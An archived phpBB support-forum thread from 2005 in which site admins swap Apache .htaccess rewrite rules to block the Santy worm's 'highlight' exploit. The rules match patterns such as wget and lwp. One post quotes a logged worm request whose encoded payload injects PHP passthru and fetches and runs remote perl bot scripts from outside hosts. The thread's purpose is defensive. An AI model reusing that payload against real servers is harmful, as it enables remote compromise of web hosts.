Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer
Contact:

Post by Joe User » Fri Jan 07, 2005 8:56 pm

The [R,L] results in a 302 response...

john_r
Registered User
Posts: 19
Joined: Thu Nov 18, 2004 8:11 pm

Post by john_r » Fri Jan 07, 2005 9:05 pm

Hi

Yes, I know that, but why should it only send some requests a 302 while others get a 200?

After the last post I changed .htaccess to

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ http://127.0.0.1 [R,L]

and later, checking my logs, I see that requests to

/phpbb/posting.php
/phpbb/profile.php
/phpbb/privmsg.php

still get re-routed, i.e. 302. All other requests get 200.

So I have banned those lines in robots.txt,

but I would like to know why only those requests get re-routed.

Rgds

Taipo
Registered User
Posts: 174
Joined: Fri Jan 07, 2005 9:25 pm
Contact:

Post by Taipo » Fri Jan 07, 2005 11:02 pm

Why focus on the occurrence of 'highlight=%2527' in a GET request string when it is in fact the occurrence of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get through the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='

bmer
Registered User
Posts: 142
Joined: Sun Dec 07, 2003 10:36 pm

Post by bmer » Sat Jan 08, 2005 8:24 am

Taipo wrote: Why focus on the occurrence of 'highlight=%2527' in a GET request string when it is in fact the occurrence of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get through the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='


You guys are all talking a foreign language to me. :lol:

Here is my problem. I upgraded my forum to 2.0.11 and it seemed to cut down on guest access, but I still have around 4-10 guests all the time. My host is running PHP 4.3.10. I tried adding that .htaccess file at the top of this post, but I get a critical error. This is driving me nuts. My host isn't much help. What can I do? Can someone help? I get dizzy reading through all these posts. :lol:

px1369
Registered User
Posts: 42
Joined: Tue Aug 13, 2002 4:37 pm

Post by px1369 » Mon Jan 10, 2005 3:53 pm

I just want to confirm that this htaccess modification will fix my troubles?

Code:

RewriteEngine On

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
# (stray "%" after the closing brace of the variable removed; it is not valid mod_rewrite syntax)
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
I have had several hundred different IPs attempt to access my server and one account that has thousands of visitors daily is still receiving these:

Code:

/viewtopic.php?t=125&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1

Code:

Mod_Security-Message:
Access denied with code 406. Pattern match "wget " at THE_REQUEST.
Thanx
I am, therefore I think.
I think, therefore I am.
Therefore I think I am?

Mikalee
Registered User
Posts: 42
Joined: Thu Apr 10, 2003 3:48 pm
Contact:

Post by Mikalee » Tue Jan 11, 2005 10:11 pm

[Edit - problem corrected, server issue]
Last edited by Mikalee on Fri Jan 21, 2005 7:31 pm, edited 1 time in total.

jsprague
Registered User
Posts: 21
Joined: Tue Aug 05, 2003 3:07 am
Location: Oregon
Contact:

Post by jsprague » Thu Jan 13, 2005 8:12 am

Hello,

Just wondering what the following code listed in the .htaccess examples will do..

Code:

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?

Thanks!

Joe User
Registered User
Posts: 71
Joined: Mon Sep 13, 2004 9:56 am
Location: Germany
Name: Markus Kohlmeyer
Contact:

Post by Joe User » Thu Jan 13, 2005 9:53 am

jsprague wrote:

Code:

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?


It redirects the requests back to the source system ;)

FuZiWuZi
Registered User
Posts: 82
Joined: Fri Sep 13, 2002 3:21 pm
Location: Belgium (Brussels)
Contact:

Post by FuZiWuZi » Sat Jan 22, 2005 10:26 am

Hello,

If I buy a new hosting and download a new version of phpbb do I have to run the patch for this worm? Or is it already done?

thx,
Fuz
Hello folks!!

-=ORC_The_Dude=-
Registered User
Posts: 40
Joined: Mon Oct 18, 2004 5:09 pm

Post by -=ORC_The_Dude=- » Sat Jan 22, 2005 3:55 pm

-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


Win98SE supports the *.htaccess extension. It doesn't allow me to rename a file as .htaccess without anything before the dot.



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???
have you READ this topic...http://www.phpbb.com/phpBB/viewtopic.php?t=128123
Babe, you're acting like I have cheated on you, and I have never cheated on you. Except for that one time, with myself, and you caught me.

Psychotic_Carp
Registered User
Posts: 556
Joined: Fri Dec 03, 2004 1:45 pm

Post by Psychotic_Carp » Sun Jan 23, 2005 3:08 am

-=ORC_The_Dude=- wrote:
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


Win98SE supports the *.htaccess extension. It doesn't allow me to rename a file as .htaccess without anything before the dot.



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???


Try this:

there is already a .htaccess file in your phpbb folder (the cache folder).

Download it to your desktop, make Notepad open it (or get HTML-Kit, google it), paste in the code and save it, then upload it where you want it.


What I want to know is: what is the best code to currently use? And what folders are the best to use? (Replace the one in the cache folder? And can I place the file in multiple locations?)

damiel
Registered User
Posts: 12
Joined: Wed Dec 22, 2004 3:35 pm
Location: Frontios

Post by damiel » Mon Jan 24, 2005 6:05 pm

whit wrote: You could probably get away with:

Code:

RewriteEngine On 
RewriteBase / 

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$        -       [F,L]   
The highlight line catches, I think, all the variants of Santy I've logged. The next catches all the attempts at custom hacks from Perl I've seen so far (everything starting with LWP or lwp - the "NC" means "no case"). You can at the very least get rid of all the LWP and lwp lines but that one.


I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel

damiel
Registered User
Posts: 12
Joined: Wed Dec 22, 2004 3:35 pm
Location: Frontios

Post by damiel » Mon Jan 24, 2005 6:31 pm

BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

jsundqui
Registered User
Posts: 40
Joined: Thu Apr 29, 2004 2:25 am

Post by jsundqui » Mon Jan 24, 2005 7:53 pm

damiel wrote: I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel


It seems the worms kicked it up a notch today at my site as well. I did the modrewrite changes to .htaccess a while ago so they all get 403'd, but I was only getting worm attempts every few minutes or so, and from what seemed to be hijacked cable/DSL home lusers. But today it has cranked up to every 10 seconds or so, and seem to be coming from hosting outfits. This all based on unscientific sampling of IPs to lookup. But the hit rate is definitely a huge spike today.

BTW, I've been getting some users registering from Russia that seem intent on breaking in. They got in a while ago, probably by reading config.php before I upgraded to 2.0.11 (and I had the same password for the db as the site - since changed) (curiously, site was not defaced as was done with other santy attacks, although my portal page was eventually hacked, no other files deleted, though). But it is curious that they needed to sign up as users to do this. Is there another crack out there not yet discovered or reported?
